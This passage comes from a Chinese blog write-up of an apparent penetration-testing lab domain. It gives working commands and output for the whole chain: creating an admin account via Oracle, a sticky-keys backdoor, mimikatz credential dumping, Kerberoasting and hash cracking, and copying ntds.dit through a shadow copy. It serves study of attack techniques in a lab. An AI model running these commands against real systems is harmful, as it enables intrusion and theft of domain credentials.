error\u95ee\u9898\u89e3\u51b3<\/a><\/p>\n\n\n\n<p>\u4e0d\u8fc7\u540e\u6765\u53d1\u73b0\u5176\u5b9e\u4e0d\u4e00\u5b9a\u975e\u8981\u8fde\u63a5\u4e0a\u53bb\uff0c\u56e0\u4e3axradmin\u6709DBA\u6743\u9650\uff0c\u7528odat\u5c31\u80fd\u76f4\u63a5\u6267\u884c\u547d\u4ee4\u4e86\uff0c\u52a0\u4e2a\u8d26\u6237rdp\u4e0a\u53bb<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user fushuling qwer1234! \/add'\nproxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators fushuling \/add'<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/9-3.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/9-3.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/10-3-1024x511.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/10-3-1024x511.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>internal-secret\u91cc\u6709\u4e00\u4e2a\u6587\u672c\uff0c\u91cc\u9762\u662f\u4e00\u5806\u8d26\u53f7\u4fe1\u606f\uff0c\u4ece\u91cc\u9762\u627e\u5230XR-0923\u7684<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/11-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/11-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>XR-0923 | zhangshuai | wSbEajHzZs<\/code><\/pre>\n\n\n\n<p>RDP\u4e0aXR-0923\u7684\u65f6\u5019\u53d1\u73b0\u8fd9\u4e2a\u7528\u6237\u5c5e\u4e8eRemote Desktop Users\u548cRemote Management Users\u7ec4\u6240\u4ee5\u80fdevil-winrm\u4e0a\u53bb\uff0c\u611f\u89c9\u7528\u8fd9\u4e2a\u8fde\u4e0a\u53bb\u6743\u9650\u9ad8\u70b9\uff1f\u600e\u4e48\u591a\u4e86\u4e00\u4e9b\u7279\u6743<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/12-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/12-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/13-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/13-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u56e0\u4e3a\u6709SeRestorePrivilege\uff0c\u6240\u4ee5\u80fd\u65e0\u89c6ACL\u4fee\u6539\u6587\u4ef6\u6216\u8005\u7f16\u8f91\u6ce8\u518c\u8868\uff0c\u7c7b\u4f3c\u4e8e\u4e4b\u524d\u7684\u653e\u5927\u955c\u63d0\u6743\uff0c\u6211\u4eec\u53ef\u4ee5\u628acmd.exe\u91cd\u547d\u540d\u4e3asethc.exe\uff0c\u7136\u540e\u5728\u9501\u5c4f\u754c\u9762\u8fde\u6309\u4e94\u6b21shift\u542f\u52a8sethc\u63d0\u6743<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ren sethc.exe sethc.bak\nren cmd.exe sethc.exe<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/14-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/14-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" style=\"width:840px;height:auto\"\/><\/div><\/figure>\n\n\n\n<p>\u9501\u5c4f\u754c\u9762\u8fde\u6309\u4e94\u4e0bshift\u542f\u52a8\u7c98\u8fde\u952e\uff0c\u53ef\u4ee5\u770b\u5230\u5df2\u7ecfsystem\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/15-1-1024x601.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/15-1-1024x601.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u62ffflag\u7136\u540e\u6dfb\u52a0\u4e2aadmin\u8d26\u53f7\u91cd\u65b0\u767b\u8fdb\u53bb<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>type C:\\Users\\Administrator\\flag\\flag03.txt\nnet user fushuling qwer1234! \/add\nnet localgroup administrators fushuling \/add<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/16-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/16-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u96be\u7ef7\u7684\u662f\u6211\u6539\u5b8c\u540d\u4e4b\u540e\u6539\u4e0d\u56de\u6765\u4e86\uff0c\u53ef\u80fd\u5f97\u7528zhangshuai\u7528\u6237\u6539\uff0c\u4e0d\u8fc7\u4e5f\u4e0d\u5f71\u54cd\u540e\u9762\u7ee7\u7eed\u6253\uff0c\u6293\u4e00\u4e0b\u5bc6\u7801(\u5fc5\u987b\u75282.2\u7684\uff0c\u4e0d\u7136\u4f1a\u62a5\u9519)<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/17-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/17-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>mimikatz # privilege::debug\nPrivilege '20' OK\n\nmimikatz # sekurlsa::logonpasswords\n\n......\nuthentication Id : 0 ; 5911516 (00000000:005a33dc)\nSession           : Interactive from 3\nUser Name         : UMFD-3\nDomain            : Font Driver Host\nLogon Server      : (null)\nLogon Time        : 2023\/10\/10 21:37:36\nSID               : S-1-5-96-0-3\n        msv :\n         &#91;00000003] Primary\n         * Username : XR-0923$\n         * Domain   : XIAORANG\n         * NTLM     : e89745986378835c3e1781da017fcb27\n         * SHA1     : 186e01ef383f305b1c636de1aa63753607ea0826\n        tspkg :\n        wdigest :\n         * Username : XR-0923$\n         * Domain   : XIAORANG\n         * Password : (null)\n        kerberos :\n         * Username : XR-0923$\n         * Domain   : xiaorang.lab\n         * Password : af 8b 8e 71 25 e9 47 3d 60 f2 df 99 21 68 f5 7b 93 54 8c 54 b1 a8 96 0d 37 c3 9f cb 49 c7 b0 89 d1 75 8a 21 ae 39 96 86 09 c5 ef 6e 8a 83 2c 75 e2 d9 31 47 21 64 bf 4a 50 16 cd e1 15 e0 33 4e cd 86 3a 89 13 a5 b5 23 6c 77 bf 8f ac d4 cd 3f 83 60 a5 24 fb dd e0 bd 68 54 28 68 d8 f8 86 eb e1 dc 5c a3 5d 5c a6 6a ae d0 13 fe 3c be 58 b7 86 0e fe 9f c7 90 53 df 8b 09 3d 30 d2 40 71 66 6c 70 00 0f 40 d0 f3 7a 3d b1 43 a2 c4 12 17 c5 dd 29 92 b3 72 c5 02 aa 0c 0a f1 fd f5 47 83 ba 2b 1c e8 65 68 e8 23 56 ce d8 da bc cf c3 eb 71 25 a5 20 54 97 50 de 09 7c a8 3a 77 14 cb 33 a1 af 04 af e4 4b 92 85 82 61 67 75 3f fa bb 42 b4 c4 5f 30 ce 5a 4f 41 70 e4 ec ae 4d 0e f8 8a 51 32 8b d1 2d 03 03 37 06 55 d7 9e 2c 08 17 8c e3\n        ssp :\n        credman :\n        cloudap :\n......<\/code><\/pre>\n\n\n\n<p>\u62ff\u7740 <code>XR-0923$<\/code> \u7684ntlm\u54c8\u5e0c\u770bSPN\u80fd\u627e\u5230\u4e00\u4e2atianjing\u7528\u6237<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains impacket-GetUserSPNs xiaorang.lab\/'XR-0923$' -hashes ':e89745986378835c3e1781da017fcb27' -dc-ip 172.22.14.11<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/18-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/18-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u6293\u4e00\u4e0b\u54c8\u5e0c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains impacket-GetUserSPNs xiaorang.lab\/'XR-0923$' -hashes ':e89745986378835c3e1781da017fcb27' -dc-ip 172.22.14.11 -request-user tianjing<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/19-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/19-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>hashcat\u7206\u7834<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>hashcat -m 13100 -a 0 1.txt \/usr\/share\/wordlists\/rockyou.txt --force<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/20-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/20-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>tianjing:DPQSXSXgh2<\/code><\/pre>\n\n\n\n<p>evil-winrm\u4e0a\u53bb<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2 \nwhoami \/priv<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/21-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/21-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>\u6709\u5907\u4efd\u4ee5\u53ca\u8fd8\u539f\u6587\u4ef6\u6216\u76ee\u5f55\u7684\u6743\u9650\uff0c\u53ef\u4ee5\u5377\u5f71\u62f7\u8d1d\u7136\u540e\u8bfbsam(SAM\u662f\u5b89\u5168\u8d26\u6237\u7ba1\u7406\u5668\u6570\u636e\u5e93\uff0c\u5305\u542b\u4e86\u672c\u5730\u7528\u6237\u53ca\u7528\u6237\u7ec4,\u5305\u62ec\u5b83\u4eec\u7684\u53e3\u4ee4\u53ca\u5176\u4ed6\u5c5e\u6027\uff0c\u4f4d\u4e8e\u6ce8\u518c\u8868\u7684HKLM<em>\\<\/em>SAM\u4e0b\u9762)<\/p>\n\n\n\n<p>\u672c\u5730\u521b\u4e00\u4e2araj.dsh\uff0c\u5199\u5165<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>set context persistent nowriters\nadd volume c: alias raj\ncreate\nexpose %raj% z:<\/code><\/pre>\n\n\n\n<p>\u63a5\u7740\u7528unix2dos raj.dsh\u8f6c\u5316\u683c\u5f0f<\/p>\n\n\n\n<p>\u7136\u540e\u5207\u6362\u5230C\u76ee\u5f55\uff0c\u7136\u540e\u521b\u4e00\u4e2atest\u6587\u4ef6\u5939\u5207\u6362\u8fc7\u53bb(\u4e0d\u7136\u540e\u9762\u4f1a\u6ca1\u6743\u9650)\uff0c\u628a\u672c\u5730\u7684raj.dsh\u4e0a\u4f20\u4e0a\u53bb<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mkdir test\ncd test\nupload raj.dsh<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/22-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"605\" height=\"311\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/22-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2794\"  sizes=\"auto, (max-width: 605px) 100vw, 605px\" \/><\/div><\/figure>\n\n\n\n<p>\u5377\u5f71\u62f7\u8d1d<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>diskshadow \/s raj.dsh<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/23-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"758\" height=\"473\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/23-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2795\"  sizes=\"auto, (max-width: 758px) 100vw, 758px\" \/><\/div><\/figure>\n\n\n\n<p>\u590d\u5236\u5230\u5230\u5f53\u524d\u76ee\u5f55\uff0c\u4e5f\u5c31\u662f\u6211\u4eec\u521b\u5efa\u7684\u8fd9\u4e2atest\u76ee\u5f55<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>RoboCopy \/b z:\\windows\\ntds . ntds.dit<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/24.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"753\" height=\"493\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/24.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2796\"  sizes=\"auto, (max-width: 753px) 100vw, 753px\" \/><\/div><\/figure>\n\n\n\n<p>\u6700\u540e\u628asam\u4e0b\u4e0b\u6765\uff0c\u4e0d\u77e5\u9053\u662f\u4e0d\u662f\u6211\u4ee3\u7406\u7684\u95ee\u9898\uff0c\u8d3c\u6162\uff0c\u627e\u4e0d\u5230\u56fe\u4e86\uff0c\u53cd\u6b63\u547d\u4ee4\u5c31\u662fdownload  ntds.dit<\/p>\n\n\n\n<p>\u63a5\u4e0b\u6765\u4e0b\u8f7dsystem<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>reg save HKLM\\SYSTEM system\ndownload system<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/25.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"706\" height=\"101\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/25.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2792\"  sizes=\"auto, (max-width: 706px) 100vw, 706px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/26.png'><img class=\"lazyload lazyload-style-1\" 